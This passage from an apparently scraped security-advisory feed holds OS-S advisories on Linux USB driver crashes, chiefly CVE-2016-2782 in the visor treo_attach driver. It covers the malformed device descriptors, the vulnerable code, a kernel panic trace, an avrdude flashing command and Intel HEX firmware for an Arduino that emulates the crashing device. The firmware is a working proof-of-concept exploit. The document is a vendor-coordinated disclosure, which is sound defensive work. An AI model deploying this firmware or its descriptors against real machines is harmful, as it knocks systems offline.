\n:100C300090937405809373058B8D9C8D90937C05A8 \n:100C400080937B058D8D9E8D90937A058093790599 \n:100C50008F8D98A1909378058093770510927205F7 \n:100C600081E08093D70080EA8093D80082E189BD3B \n:100C700009B400FEFDCF61E070E080E090E00E94EA \n:100C80007B0280E98093D8008CE08093E200109290 \n:100C9000E000559A209ADF91CF91089581E08093EA \n:100CA000E00008959091C80095FFFCCF8093CE009E \n:100CB00008951092CD0087E68093CC0088E1809360 \n:100CC000C9008EE08093CA0008950F931F93CF93BD \n:100CD000DF93EC018C01FE0101900020E9F73197D0 \n:100CE000EC1BFD0BC8018C1B9D0B8E179F0730F46E \n:100CF000F80181918F010E945206EDCFDF91CF91D3 \n:100D00001F910F910895CF93DF93CDB7DEB7DA959A \n:100D10000FB6F894DEBF0FBECDBFFE01EB5FFE4FF6 \n:100D2000419151919F0160E071E0CE0101960E94D6 \n:100D30000707CE0101960E946506D3950FB6F89479 \n:100D4000DEBF0FBECDBFDF91CF9108958F929F92EE \n:100D5000AF92BF92CF92DF92EF92FF920F931F93C9 \n:100D6000CF93DF9300D0CDB7DEB75B0122E535E04E \n:100D70003F932F9389839A830E9483068981882ECB \n:100D80009A81992E0F900F9000E010E08EE5E82EEA \n:100D900085E0F82E91E1C92E94E0D92E0A151B05A5 \n:100DA000E4F4F40181914F0190E09F938F93FF92BF \n:100DB000EF920E9483060F5F1F4FC8018F70992723 \n:100DC0000F900F900F900F90892B41F7DF92CF92E9 \n:100DD0000E9483060F900F90E1CF81E194E09F93F2 \n:100DE0008F930E9483060F900F900F900F90DF91CA \n:100DF000CF911F910F91FF90EF90DF90CF90BF9018 \n:100E0000AF909F908F900895F8940C94E809AEE00D \n:100E1000B0E0EDE0F7E00C94BF098C01CA0146E0B8 \n:100E20004C831A83098377FF02C060E070E8615049 \n:100E300071097E836D83A901BC01CE0101960E94D8 \n:100E400033074D815E8157FD0AC02F8138854217D7 \n:100E500053070CF49A01F801E20FF31F10822E964B \n:100E6000E4E00C94DB09ACE0B0E0E9E3F7E00C94DB \n:100E7000B1097C016B018A01FC0117821682838112 \n:100E800081FFBDC1CE0101964C01F7019381F601AE \n:100E900093FD859193FF81916F01882309F4ABC184 \n:100EA000853239F493FD859193FF81916F018532ED \n:100EB00029F4B70190E00E941B09E7CF512C312C97 \n:100EC00020E02032A0F48B3269F030F4803259F007 \n:100ED000833269F420612CC08D3239F0803339F4CB \n:100EE000216026C02260246023C0286021C027FD25 \n:100EF00027C030ED380F3A3078F426FF06C0FAE00C \n:100F00005F9E300D1124532E13C08AE0389E300DA1 \n:100F10001124332E20620CC08E3221F426FD6BC1C9 \n:100F2000206406C08C3611F4206802C0883641F473 \n:100F3000F60193FD859193FF81916F018111C1CFDE \n:100F4000982F9F7D9554933028F40C5F1F4FFFE33B \n:100F5000F9830DC0833631F0833771F0833509F0A2 \n:100F60005BC022C0F801808189830E5F1F4F44243B \n:100F70004394512C540115C03801F2E06F0E711CDE \n:100F8000F801A080B18026FF03C0652D70E002C08B \n:100F90006FEF7FEFC5012C870E9410092C018301A0 \n:100FA0002C852F77222E17C03801F2E06F0E711CAE \n:100FB000F801A080B18026FF03C0652D70E002C05B \n:100FC0006FEF7FEFC5012C870E9405092C012C854E \n:100FD0002068222E830123FC1BC0832D90E048163D \n:100FE0005906B0F4B70180E290E00E941B093A94E0 \n:100FF000F4CFF50127FC859127FE81915F01B701B0 \n:1010000090E00E941B0931103A94F1E04F1A510808 \n:101010004114510471F7E5C0843611F0893639F571 \n:10102000F80127FF07C060817181828193810C5F85 \n:101030001F4F08C060817181882777FD8095982FA8 \n:101040000E5F1F4F2F76B22E97FF09C090958095A7 \n:10105000709561957F4F8F4F9F4F2068B22E2AE089 \n:1010600030E0A4010E944D09A82EA81844C085377D \n:1010700029F42F7EB22E2AE030E025C0F22FF97F2E \n:10108000BF2E8F36C1F018F4883579F0B4C08037A0 \n:1010900019F0883721F0AFC02F2F2061B22EB4FE97 \n:1010A0000DC08B2D8460B82E09C024FF0AC09F2F6D \n:1010B0009660B92E06C028E030E005C020E130E09F \n:1010C00002C020E132E0F801B7FE07C06081718103 \n:1010D000828193810C5F1F4F06C06081718180E027 \n:1010E00090E00E5F1F4FA4010E944D09A82EA81882 \n:1010F000FB2DFF77BF2EB6FE0BC02B2D2E7FA51428 \n:1011000050F4B4FE0AC0B2FC08C02B2D2E7E05C0E0 \n:101110007A2C2B2D03C07A2C01C0752C24FF0DC016 \n:10112000FE01EA0DF11D8081803311F4297E09C092 \n:1011300022FF06C07394739404C0822F867809F04E \n:10114000739423FD13C020FF06C05A2C731418F4A7 \n:10115000530C5718732C731468F4B70180E290E0B5 \n:101160002C870E941B0973942C85F5CF731410F4FF \n:10117000371801C0312C24FF12C0B70180E390E082 \n:101180002C870E941B092C8522FF17C021FF03C05A \n:1011900088E590E002C088E790E0B7010CC0822F9C \n:1011A000867859F021FD02C080E201C08BE227FD64 \n:1011B0008DE2B70190E00E941B09A51438F4B70135 \n:1011C00080E390E00E941B095A94F7CFAA94F4019F \n:1011D000EA0DF11D8081B70190E00E941B09A1106A \n:1011E000F5CF332009F451CEB70180E290E00E94A0 \n:1011F0001B093A94F6CFF7018681978102C08FEFE1 \n:101200009FEF2C96E2E10C94CD09FC010590615012 \n:1012100070400110D8F7809590958E0F9F1F08950C \n:10122000FC016150704001900110D8F780959095B5 \n:101230008E0F9F1F08950F931F93CF93DF93182F47 \n:10124000092FEB018B8181FD03C08FEF9FEF20C041 \n:1012500082FF10C04E815F812C813D814217530770 \n:101260007CF4E881F9819F012F5F3F4F3983288308 \n:10127000108306C0E885F985812F0995892B29F708 \n:101280002E813F812F5F3F4F3F832E83812F902FF1 \n:10129000DF91CF911F910F910895FA01AA2728306D \n:1012A00051F1203181F1E8946F936E7F6E5F7F4F33 \n:1012B0008F4F9F4FAF4FB1E03ED0B4E03CD0670FAF \n:1012C000781F891F9A1FA11D680F791F8A1F911D02 \n:1012D000A11D6A0F711D811D911DA11D20D009F452 \n:1012E00068943F912AE0269F11243019305D319394 \n:1012F000DEF6CF010895462F4770405D4193B3E07D \n:101300000FD0C9F7F6CF462F4F70405D4A3318F023 \n:10131000495D31FD4052419302D0A9F7EACFB4E0D4 \n:10132000A6959795879577956795BA95C9F700978C \n:101330006105710508959B01AC010A2E069457952D \n:10134000479537952795BA95C9F7620F731F841F84 \n:10135000951FA01D0895EE0FFF1F0590F491E02D3D \n:1013600009942F923F924F925F926F927F928F9249 \n:101370009F92AF92BF92CF92DF92EF92FF920F9324 \n:101380001F93CF93DF93CDB7DEB7CA1BDB0B0FB62E \n:10139000F894DEBF0FBECDBF09942A8839884888EB \n:1013A0005F846E847D848C849B84AA84B984C88481 \n:1013B000DF80EE80FD800C811B81AA81B981CE0F78 \n:1013C000D11D0FB6F894DEBF0FBECDBFED0108955D \n:0413D000F894FFCFBF \n:1013D4001201000200000040AD0BEFBE000101024B \n:1013E4000001220342006100640020004200410029 \n:1013F40042004500250078002500780025006E0095 \n:1014040025007000180342004100440020004300FE \n:10141400300046004600450045002100120100024C \n:10142400000000402D08000200010102030109022E \n:10143400270001010000FA0705810304040C0705D5 \n:10144400010204000C0705820104000C07000700D8 \n:101454000700480100500072006F006C00690066CC \n:101464000069006300000A550000006BFD180A00C3 \n:10147400809F0AB901312B940A8101128946001315 \n:10148400000257028B0A5E0AF80A5F01F212010099 \n:1014940002010000400D055702000101020301B9D9 \n:1014A4000A0100F80A5F0A810A220342006100640B \n:1014B400002000420041004200450025007800253C \n:1014C40000780025006E00250070001803420041DA \n:1014D400004400200043003000460046004500451B \n:1014E40000210012010002010000400D0557020016 \n:1014F400010102030109040000030100000003F2DA \n:101504000AEC0A0902270001010000FA01AB0A09EA \n:101514000400000301000000090200202020202014 \n:101524005F5F5F5F5F5F5F5F2020202020202020BF \n:1015340020202020202020202020202020202020A7 \n:1015440020205F5F5F5F5F205F5F20205F2020209F \n:101554002020205F5F0A0D00202020202F205F5FC5 \n:101564005F5F2F202F5F20205F5F5F5F205F5F5FE3 \n:101574005F5F20205F5F5F5F5F20202020202F209F \n:101584005F5F5F2F2F202F5F285F295F5F5F5F2FD3 \n:10159400202F5F5F0A0D002020202F202F202020E5 \n:1015A4002F205F5F205C2F205F5F20602F205F5F14 \n:1015B400205C2F205F5F5F2F5F5F5F5F205C5F5F5A \n:1015C400205C2F205F5F2F202F205F5F5F2F202F55 \n:1015D4002F5F2F0A0D0020202F202F5F5F5F2F2009 \n:1015E4002F202F202F202F5F2F202F202F5F2F2001 \n:1015F400285F5F2020292F5F5F5F2F205F5F2F20F0 \n:101604002F202F5F2F202F202F5F5F2F202C3C0AAD \n:101614000D0020205C5F5F5F5F2F5F2F202F5F2F07 \n:101624005C5F5F2C5F2F5C5F5F5F5F2F5F5F5F5F5F \n:101634002F20202020202F5F5F5F5F2F5C5F5F2FB4 \n:101644005F2F5C5F5F5F2F5F2F7C5F7C0A0D002044 \n:101654003C3C2043485241534820414E59204F506E \n:1016640045524154494E472053595354454D203E09 \n:101674003E0A0D00203C3C202863292053657267F4 \n:10168400656A20536368756D696C6F20323031353B \n:101694002C204F70656E536F7572636520536563BC \n:1016A40075726974792052616C66205370656E6E30 \n:1016B4006562657267203E3E0A0D000A3E3E205078 \n:1016C4007265737320627574746F6E20746F207307 \n:1016D4007461727420657865637574696F6E2E2EFB \n:1016E4002E0A0D005B44454255475D2045786563ED \n:1016F400757465207061796C6F616420300A0D0027 \n:10170400526563762D446174613A0A0D005B444569 \n:101714004255475D200953656E6420436F6E6669C8 \n:101724006775726174696F6E44657363726970740E \n:101734006F720928696E6465783A2569292E2E2E00 \n:101744000D0A005B44454255475D200953656E64AC \n:1017540020496E74657266616365204465736372C3 \n:101764006970746F720928696E7465726661636565 \n:101774003A2569292E2E2E0D0A005B444542554711 \n:101784005D200953656E6420456E64706F696E74E4 \n:101794002044657363726970746F720928656E649E \n:1017A400706F696E743A2569292E2E2E0D0A005B1E \n:1017B40044454255475D203C3C70616E6963206D31 \n:1017C4006F64653F3E3E0D0A005B44454255475DEC \n:1017D4002009203E3E20537472696E67204465736D \n:1017E40063726970746F72207265717565737420A9 \n:1017F4002D2073656E64696E67206D616C666F720F \n:101804006D656420737472696E67212073657475E5 \n:10181400702E7756616C75654C203D3D2025690D11 \n:101824000A005B48455844554D505D0A0D0025306B \n:041834003258200006 \n:00000001FF \n \n-- \nOpenSource Security Ralf Spenneberg http://www.os-s.de \nAm Bahnhof 3-5 48565 Steinfurt Germany \nFon: +49(0)2552 638 755 Fax: +49(0)2552 638 757 \n`\n", "sourceHref": "https://packetstormsecurity.com/files/download/136218/OSS-2016-14_gtco.txt", "cvss": {"score": 4.9, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-12-05T22:24:10", "description": "", "cvss3": {}, "published": "2016-03-09T00:00:00", "type": "packetstorm", "title": "Linux visor (treo_attach) Null Pointer Dereference", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2016-2782"], "modified": "2016-03-09T00:00:00", "id": "PACKETSTORM:136142", "href": "https://packetstormsecurity.com/files/136142/Linux-visor-treo_attach-Null-Pointer-Dereference.html", "sourceData": "`OS-S Security Advisory 2016-10 \nLinux visor (treo_attach) Nullpointer Dereference \n \nDate: March 4th, 2016 \nAuthors: Sergej Schumilo, Hendrik Schwartke, Ralf Spenneberg \nCVE: CVE-2016-2782 \nCVSS: 4.9 (AV:L/AC:L/Au:N/C:N/I:N/A:C) \nTitle: Local RedHat Enterprise Linux DoS \u2013 RHEL 7.1 Kernel crashes on invalid \nUSB device descriptors (visor treo_attach driver) \nSeverity: Critical. The Kernel panics. A reboot is required. \nEase of Exploitation: Trivial \nVulnerability type: Wrong input validation \nProducts: RHEL 7.1 including all updates \nKernel-Version: 3.10.0-229.20.1.el7.x86_64 (for debugging-purposes we used the \nCentOS Kernel kernel-debuginfo-3.10.0-229.14.1.el7) \nVendor: Red Hat \nVendor contacted: November, 12th 2015 \nPDF of advisory: https://os-s.net/advisories/OSS-2016-10_visor_treo_attach.pdf \n \nAbstract: \nThe Kernel 3.10.0-229.20.1.el7.x86_64 crashes on presentation of a buggy USB \ndevice requiring the visor (treo_attach) driver. \n \nDetailed product description: \nWe confirmed the bug on the following system: \nRHEL 7.1 \nKernel 3.10.0-229.20.1.el7.x86_64 \nFurther products or kernel versions have not been tested. \nHow reproducible: Always \nActual results: Kernel crashes. \n \nDescription: \nThe bug was found using the USB-fuzzing framework vUSBf from Sergej Schumilo \n(github.com/schumilo) using the following device descriptor: \n \n[*] Device-Descriptor \nbLength: 0x12 \nbDescriptorType: 0x1 \nbcdUSB: 0x200 \nbDeviceClass: 0x3 \nbDeviceSubClass: 0x0 \nbDeviceProtocol: 0x0 \nbMaxPacketSize: 0x40 \nidVendor: 0x82d \nidProduct: 0x200 \nbcdDevice: 0x100 \niManufacturer: 0x1 \niProduct: 0x2 \niSerialNumbers: 0x3 \nbNumConfigurations: 0x1 \n \n \n \nThe treo_attach function does not use the num_ports (struct usb_serial) value \nfor any kind of sanity checks during the initialization process. Due to an \nincomplete sanity check, the driver could try to dereference a null-pointer if \na malformed device-descriptor is presented (zero-value for bNumEndpoints or no \nrequired endpoint-descriptors is provided). \nThis results in a crash of the system. \n \n \n \n \n**** \n... \n554 #define COPY_PORT(dest, src) \\ \n555 do { \\ \n556 int i; \\ \n557 \\ \n558 for (i = 0; i < ARRAY_SIZE(src->read_urbs); ++i) { \\ \n559 dest->read_urbs[i] = src->read_urbs[i]; \\ /* Possible \nNullpointer-Dereference */ \n560 dest->read_urbs[i]->context = dest; \\ \n561 dest->bulk_in_buffers[i] = src->bulk_in_buffers[i]; \\ \n562 } \\ \n563 dest->read_urb = src->read_urb; \\ \n564 dest->bulk_in_endpointAddress = src->bulk_in_endpointAddress;\\ \n565 dest->bulk_in_buffer = src->bulk_in_buffer; \\ \n566 dest->bulk_in_size = src->bulk_in_size; \\ \n567 dest->interrupt_in_urb = src->interrupt_in_urb; \\ \n568 dest->interrupt_in_urb->context = dest; \\ \n569 dest->interrupt_in_endpointAddress = \\ \n570 src->interrupt_in_endpointAddress;\\ \n571 dest->interrupt_in_buffer = src->interrupt_in_buffer; \\ \n572 } while (0); \n573 \n574 swap_port = kmalloc(sizeof(*swap_port), GFP_KERNEL); \n575 if (!swap_port) \n576 return -ENOMEM; \n577 COPY_PORT(swap_port, serial->port[0]); /* no sanity-check! */ \n578 COPY_PORT(serial->port[0], serial->port[1]); /* no sanity-check! */ \n579 COPY_PORT(serial->port[1], swap_port); /* no sanity-check! */ \n... \n**** \n \n \n[*] Configuration-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x2 \nwTotalLength: 0x27 \nbNumInterfaces: 0x1 \nbConfigurationValue: 0x1 \niConfiguration: 0x0 \nbmAttributes: 0x0 \nbMaxPower: 0x31 \n[*] Interface-Descriptor \nbLength: 0x9 \nbDescriptorType: 0x4 \nbInterfaceNumber: 0x0 \nbAlternateSetting: 0x0 \nbNumEndpoints: 0x3 \nbInterfaceClass: 0x0 \nbInterfaceSubClass: 0x0 \nbInterfaceProtocol: 0x0 \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x81 \nbmAttribut: 0x3 \nwMaxPacketSize: 0x404 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x1 \nbmAttribut: 0x2 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n[*] Endpoint-Descriptor: \nbLength: 0x7 \nbDescriptorType: 0x5 \nbEndpointAddress: 0x82 \nbmAttribut: 0x1 \nwMaxPacketSize: 0x4 \nbInterval: 0xc \n \nProof of Concept: \nFor a proof of concept, we are providing an Arduino Leonardo firmware file. This \nfirmware will emulate the defective USB device. \n \n \navrdude -v -p ATMEGA32u4 -c avr109 -P /dev/ttyACM0 -b 57600 -U \nflash:w:binary.hex \n \n \nThe firmware has been attached to this bug report. \nTo prevent the automated delivery of the payload, a jumper may be used to \nconnect port D3 and 3V3! \n \nSeverity and Ease of Exploitation: \nThe vulnerability can be easily exploited. Using our Arduino Leonardo firmware, \nonly physical access to the system is required. \n \nVendor Communication: \nWe contacted Red Hat on the November, 12th 2015. \nThis bug was fixed upstream. A CVE number was not assigned. \n \nReferences: \nhttps://bugzilla.redhat.com/show_bug.cgi?id=1283374 \nhttp://git.kernel.org/cgit/linux/kernel/git/torvalds/linux.git/commit/?id=cac9b50b0d75a1d50d6c056ff65c005f3224c8e0 \n \n \nKernel Stacktrace: \n \n[ 35.176832] usb 1-1: new full-speed USB device number 2 using xhci_hcd \n[ 35.400183] usb 1-1: New USB device found, idVendor=082d, idProduct=0200 \n[ 35.407780] usb 1-1: New USB device strings: Mfr=1, Product=2, \nSerialNumber=3 \n[ 35.417186] usb 1-1: Product: \u0109 \n[ 35.421846] usb 1-1: Manufacturer: \u0109 \n[ 35.425686] usb 1-1: SerialNumber: % \n[ 35.438608] usb 1-1: ep 0x81 - rounding interval to 64 microframes, ep desc \nsays 96 microframes \n[ 35.493316] usbcore: registered new interface driver visor \n[ 35.503150] usbserial: USB Serial support registered for Handspring Visor / \nPalm OS \n[ 35.512980] usbserial: USB Serial support registered for Sony Clie 5.0 \n[ 35.521056] usbserial: USB Serial support registered for Sony Clie 3.5 \n[ 35.535245] visor 1-1:1.0: Handspring Visor / Palm OS converter detected \n[ 35.542409] BUG: unable to handle kernel NULL pointer dereference at \n00000000000000b0 \n[ 35.543244] IP: [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor] \n[ 35.543244] PGD 0 \n[ 35.543244] Oops: 0002 [#1] SMP \n[ 35.543244] Modules linked in: visor(+) ip6t_rpfilter ip6t_REJECT ipt_REJECT \nxt_conntrack ebtable_nat ebtable_broute bridge stp llc ebtable_filter ebtables \nip6table_nat nf_conntrack_ipv6 nf_defrag_ipv6 nf_nat_ipv6 ip6table_mangle \nip6table_security ip6table_raw ip6table_filter ip6_tables iptable_nat \nnf_conntrack_ipv4 nf_defrag_ipv4 nf_nat_ipv4 nf_nat nf_conntrack \niptable_mangle iptable_security iptable_raw iptable_filter ip_tables bochs_drm \nppdev syscopyarea sysfillrect sysimgblt ttm drm_kms_helper drm pcspkr i2c_piix4 \ni2c_core serio_raw parport_pc parport xfs libcrc32c sd_mod sr_mod crc_t10dif \ncdrom crct10dif_common ata_generic pata_acpi ata_piix libata e1000 floppy \ndm_mirror dm_region_hash dm_log dm_mod \n[ 35.543244] CPU: 0 PID: 2220 Comm: systemd-udevd Not tainted \n3.10.0-229.14.1.el7.x86_64 #1 \n[ 35.543244] Hardware name: QEMU Standard PC (i440FX + PIIX, 1996), BIOS \nrel-1.8.2-0-g33fbe13 by qemu-project.org 04/01/2014 \n[ 35.543244] task: ffff88000bcfa220 ti: ffff88000bd20000 task.ti: ffff88000bd20000 \n[ 35.543244] RIP: 0010:[<ffffffffa0393651>] [<ffffffffa0393651>] \ntreo_attach+0x61/0x340 [visor] \n[ 35.543244] RSP: 0018:ffff88000bd23a78 EFLAGS: 00010286 \n[ 35.543244] RAX: ffff88000003c000 RBX: ffff88000af979c0 RCX: 000000000000a0e2 \n[ 35.543244] RDX: 0000000000000000 RSI: 00000000000000d0 RDI: ffff88000e401400 \n[ 35.543244] RBP: ffff88000bd23a80 R08: 00000000000164c0 R09: ffff88000e401400 \n[ 35.543244] R10: ffffffffa0393636 R11: ffff88000bcd0000 R12: 0000000000000404 \n[ 35.543244] R13: ffff88000be6b000 R14: ffff88000af979c0 R15: ffffffffa0395400 \n[ 35.543244] FS: 00007fb8082b4880(0000) GS:ffff88000fc00000(0000) \nknlGS:0000000000000000 \n[ 35.543244] CS: 0010 DS: 0000 ES: 0000 CR0: 000000008005003b \n[ 35.543244] CR2: 00000000000000b0 CR3: 000000000c51f000 CR4: \n00000000000006f0 \n[ 35.543244] DR0: 0000000000000000 DR1: 0000000000000000 DR2: \n0000000000000000 \n[ 35.543244] DR3: 0000000000000000 DR6: 00000000ffff0ff0 DR7: 0000000000000400 \n[ 35.543244] Stack: \n[ 35.543244] ffff88000bcd0090 ffff88000bd23c18 ffffffff8145fed1 0000000000000007 \n[ 35.543244] 000000020bd23af8 ffff88000c525830 0000000100000000 ffffffffa0395400 \n[ 35.543244] 0000010000000001 ffff88000bcd0000 0000000000000100 \nffff88000bcd0090 \n[ 35.543244] Call Trace: \n[ 35.543244] [<ffffffff8145fed1>] usb_serial_probe+0xdb1/0x1230 \n[ 35.543244] [<ffffffff812d649c>] ? ida_get_new_above+0x7c/0x2a0 \n[ 35.543244] [<ffffffff811aba6a>] ? kmem_cache_alloc+0x1ba/0x1d0 \n[ 35.543244] [<ffffffff8123e5b2>] ? sysfs_addrm_finish+0x42/0xe0 \n[ 35.543244] [<ffffffff8123e391>] ? __sysfs_add_one+0x61/0x100 \n[ 35.543244] [<ffffffff8141dc04>] usb_probe_interface+0x1c4/0x2f0 \n[ 35.543244] [<ffffffff813d30d7>] driver_probe_device+0x87/0x390 \n[ 35.543244] [<ffffffff813d34b3>] __driver_attach+0x93/0xa0 \n[ 35.543244] [<ffffffff813d3420>] ? __device_attach+0x40/0x40 \n[ 35.543244] [<ffffffff813d0e43>] bus_for_each_dev+0x73/0xc0 \n[ 35.543244] [<ffffffff813d2b2e>] driver_attach+0x1e/0x20 \n[ 35.543244] [<ffffffff8145ec4b>] usb_serial_register_drivers+0x29b/0x580 \n[ 35.543244] [<ffffffffa0398000>] ? 0xffffffffa0397fff \n[ 35.543244] [<ffffffffa039801e>] usb_serial_module_init+0x1e/0x1000 [visor] \n[ 35.543244] [<ffffffff810020e8>] do_one_initcall+0xb8/0x230 \n[ 35.543244] [<ffffffff810dd0ee>] load_module+0x133e/0x1b40 \n[ 35.543244] [<ffffffff812f7d60>] ? ddebug_proc_write+0xf0/0xf0 \n[ 35.543244] [<ffffffff810d96b3>] ? copy_module_from_fd.isra.42+0x53/0x150 \n[ 35.543244] [<ffffffff810ddaa6>] SyS_finit_module+0xa6/0xd0 \n[ 35.543244] [<ffffffff81614389>] system_call_fastpath+0x16/0x1b \n[ 35.543244] Code: e1 ba 50 05 00 00 be d0 00 00 00 e8 4a 84 e1 e0 48 85 c0 \n0f 84 e1 02 00 00 48 8b 53 20 48 8b 92 b8 01 00 00 48 89 90 b8 01 00 00 <48> \n89 82 b0 00 00 00 48 8b 53 20 48 8b 92 a8 01 00 00 48 89 90 \n[ 35.543244] RIP [<ffffffffa0393651>] treo_attach+0x61/0x340 [visor] \n[ 35.543244] RSP <ffff88000bd23a78> \n[ 35.543244] CR2: 00000000000000b0 \n[ 35.973188] ---[ end trace b239663354a1c556 ]--- \n[ 35.978862] Kernel panic - not syncing: Fatal exception \n[ 35.979835] drm_kms_helper: panic occurred, switching back to text console \n \n \nArduino Leonardo Firmware: \n \n:100000000C94A8000C94C5000C94C5000C94C50079 \n:100010000C94C5000C94C5000C94C5000C94C5004C \n:100020000C94C5000C94C5000C94C4050C942F04CA \n:100030000C94C5000C94C5000C94C5000C94C5002C \n:100040000C94C5000C94C5000C94C5000C94C5001C \n:100050000C94C5000C94C5000C94C5000C940E02C1 \n:100060000C94C5000C94C5000C94C5000C94C500FC \n:100070000C94C5000C94C5000C94C5000C94C500EC \n:100080000C94C5000C94C5000C94C5000C94C500DC \n:100090000C94C5000C94C5000C94C5000C94C500CC \n:1000A0000C94C5000C94C5000C94C5000B030E0302 \n:1000B000010305032F032F032F03120316031A0353 \n:1000C000200324032F032A030000000200080E006F \n:1000D00000030401000B000000000000000000000D \n:1000E00000000000000004080201104080401020C1 \n:1000F00040804080080204018040201002011080EE \n:100100001020404004040404040304050202020217 \n:1001100004030202020206060606060604040202A0 \n:100120000204000000002300260029002C002F00FC \n:1001300000000000250028002B002E0031000000E8 \n:100140000000240027002A002D00300000C180811B \n:1001500011241FBECFEFDAE0DEBFCDBF15E0A0E077 \n:10016000B1E0E4EDF3E102C005900D92A436B107D1 \n:10017000D9F725E0A4E6B5E001C01D92AF37B2077C \n:10018000E1F70E94C8000C9404070C940000089545 \n:10019000CF93DF93CDB7DEB7CD59D1090FB6F89421 \n:1001A000DEBF0FBECDBF0E94A1020E94C70060E06B \n:1001B00083E00E94300361E087E00E94300361E049 \n:1001C00088E00E9430030E9459067E012AE9E20E6F \n:1001D000F11C84E093E0D70111969C938E9389E003 \n:1001E00094E013969C938E93129782E2E2E1F1E001 \n:1001F0009E012F5F3F4F6901D90101900D928A95B1 \n:10020000E1F788E1E4E3F1E0DE01939601900D92DD \n:100210008A95E1F782E1ECE4F1E0DE01DB96019002 \n:100220000D928A95E1F789E0EEE5F1E0DE01A05953 \n:10023000BF4F01900D928A95E1F72A593F4F99E0FF \n:10024000992ED901E92D1D92EA95E9F78E010957FA \n:100250001F4F87E0E7E6F1E0D80101900D928A9503 \n:10026000E1F7BE0160587F4F87E0EEE6F1E0DB0189 \n:1002700001900D928A95E1F7AE0147585F4F87E0F4 \n:10028000E5E7F1E0DA0101900D928A95E1F75E0170 \n:10029000FEE8AF0EB11C86E0ECE7F1E0D50101907D \n:1002A0000D928A95E1F7CE01835B9F4FEEE0DC0172 \n:1002B0001D92EA95E9F7E3E0DC011996EC93D90188 \n:1002C0009C92F4E01196FC9311971496EC93F9012B \n:1002D000DC01292D01900D922A95E1F7FE01EC56E3 \n:1002E000FF4FDC011B96FC93EE931A971D96BC9270 \n:1002F000AE921C971183008373836283558344837A \n:100300000C5211092CE0F80111922A95E9F721E02D \n:10031000D80119962C931997FE01E059FF4F0190CF \n:100320000D929A94E1F7F8019387828761E088E063 \n:100330000E9469038BE492E00E94650688E892E0DF \n:100340000E94650687EC92E00E94650686E093E0D5 \n:100350000E94650682E493E00E9465068FE793E0C1 \n:100360000E94650684EA93E00E9465068BEE93E0A6 \n:100370000E94650683E00E949F03892B09F047C015 \n:100380005E01F3E2AF0EB11C8824839482E1982EC3 \n:1003900084E194E00E946506BF92AF92DF92CF9213 \n:1003A000FF92EF921F928F921F930F932DB73EB73C \n:1003B000225131090FB6F8943EBF0FBE2DBFADB725 \n:1003C000BEB71196FE01FB96892D01900D928A957C \n:1003D000E1F78DE695E00E94030668E873E180E0AE \n:1003E00090E00E947B028DE695E00E944E0660E060 \n:1003F00087E00E94690368E873E180E090E00E9472 \n:100400007B020FB6F894DEBF0FBECDBFC1CF6AE04E \n:1004100070E080E090E00E947B02ACCF1F920F92D0 \n:100420000FB60F9211242F933F938F939F93AF9307 \n:10043000BF938091650590916605A0916705B09185 \n:1004400068053091640523E0230F2D3720F40196D1 \n:10045000A11DB11D05C026E8230F0296A11DB11DE7 \n:10046000209364058093650590936605A0936705C6 \n:10047000B09368058091690590916A05A0916B051C \n:10048000B0916C050196A11DB11D809369059093F3 \n:100490006A05A0936B05B0936C05BF91AF919F91D6 \n:1004A0008F913F912F910F900FBE0F901F90189535 \n:1004B0003FB7F8948091690590916A05A0916B050A \n:1004C000B0916C0526B5A89B05C02F3F19F0019689 \n:1004D000A11DB11D3FBF6627782F892F9A2F620F6C \n:1004E000711D811D911D42E0660F771F881F991FA6 \n:1004F0004A95D1F70895CF92DF92EF92FF92CF9372 \n:10050000DF936B017C010E945802EB01C114D104FE \n:10051000E104F10479F00E9458026C1B7D0B683EE7 \n:100520007340A0F381E0C81AD108E108F108C8516E \n:10053000DC4FECCFDF91CF91FF90EF90DF90CF9029 \n:100540000895789484B5826084BD84B5816084BD4B \n:1005500085B5826085BD85B5816085BDEEE6F0E03C \n:10056000808181608083E1E8F0E010828081826098 \n:100570008083808181608083E0E8F0E08081816019 \n:100580008083E1E9F0E08081826080838081816006 \n:100590008083E0E9F0E0808181608083E1ECF0E03D \n:1005A000808184608083808182608083808181609B \n:1005B0008083E3ECF0E0808181608083E0ECF0E018 \n:1005C000808182608083E2ECF0E0808181608083C2 \n:1005D000EAE7F0E0808184608083808182608083AC \n:1005E000808181608083808180688083089590E02D \n:1005F000FC013197EE30F10590F5EA5AFF4F0C946B \n:10060000AB09809180008F7703C0809180008F7D3F \n:1006100080938000089584B58F7702C084B58F7D64 \n:1006200084BD0895809190008F7707C080919000DD \n:100630008F7D03C080919000877F80939000089504 \n:100640008091C0008F7703C08091C0008F7D809320 \n:10065000C00008958091C200877F8093C2000895F2 \n:10066000CF93DF9390E0FC01EA51FF4F2491FC010E \n:10067000EC5FFE4F8491882349F190E0880F991F29 \n:10068000FC01E25CFE4FA591B491805D9E4FFC01A0 \n:10069000C591D4919FB7611108C0F8948C912095B1 \n:1006A00082238C93888182230AC0623051F4F894AB \n:1006B0008C91322F309583238C938881822B888371 \n:1006C00004C0F8948C91822B8C939FBFDF91CF91C3 \n:1006D00008950F931F93CF93DF931F92CDB7DEB78B \n:1006E000282F30E0F901E853FF4F8491F901EA51D6 \n:1006F000FF4F1491F901EC5FFE4F04910023C9F004 \n:10070000882321F069830E94F7026981E02FF0E0DD \n:10071000EE0FFF1FE05DFE4FA591B4919FB7F894D7 \n:100720008C91611103C01095812301C0812B8C93A2 \n:100730009FBF0F90DF91CF911F910F910895CF939D \n:10074000DF93282F30E0F901E853FF4F8491F9013E \n:10075000EA51FF4FD491F901EC5FFE4FC491CC23D5 \n:1007600091F081110E94F702EC2FF0E0EE0FFF1FD5 \n:10077000EE5DFE4FA591B4912C912D2381E090E088 \n:1007800021F480E002C080E090E0DF91CF910895F5 \n:10079000615030F02091F100FC0120830196F8CFE8 \n:1007A000289884E680937D0508951092E9001092C0 \n:1007B00071051092700590936F0580936E050895F2 \n:1007C000FF920F931F93CF93DF93F82E8B01EA01D3 \n:1007D000BA01C8010E94A606F80120E030E08EEFC1 